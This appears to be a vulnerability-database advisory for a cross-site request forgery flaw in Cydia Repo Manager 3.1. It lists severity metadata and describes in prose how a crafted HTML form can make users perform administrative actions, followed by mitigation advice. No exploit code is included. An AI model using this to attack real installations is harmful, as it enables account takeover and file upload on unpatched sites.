vendor:
Cydia Repo Manager
by:
cr4wl3r
8,8
CVSS
HIGH
Cross-Site Request Forgery (CSRF)
352
CWE
Product Name: Cydia Repo Manager
Affected Version From: 3.1
Affected Version To: 3.1
Patch Exists: NO
Related CWE: N/A
CPE: a:damar1st:cydia_repo_manager
Metasploit:
N/A
Other Scripts:
N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References:
N/A
Nuclei Metadata: N/A
Platforms Tested: Windows
2013
Cydia Repo Manager CSRF Vulnerability
Cydia Repo Manager is vulnerable to Cross-Site Request Forgery (CSRF) attacks. An attacker can craft a malicious HTML form and submit it to the vulnerable application. This form can be used to perform administrative actions such as creating a new user, changing the password of an existing user, or uploading a malicious file. The malicious form can be hosted on any website and can be used to target users of the vulnerable application. The malicious form can also be sent via email or instant messaging.
Mitigation:
The application should implement a CSRF token to verify that the request is coming from a trusted source. The application should also implement a content security policy to prevent malicious code from being executed.
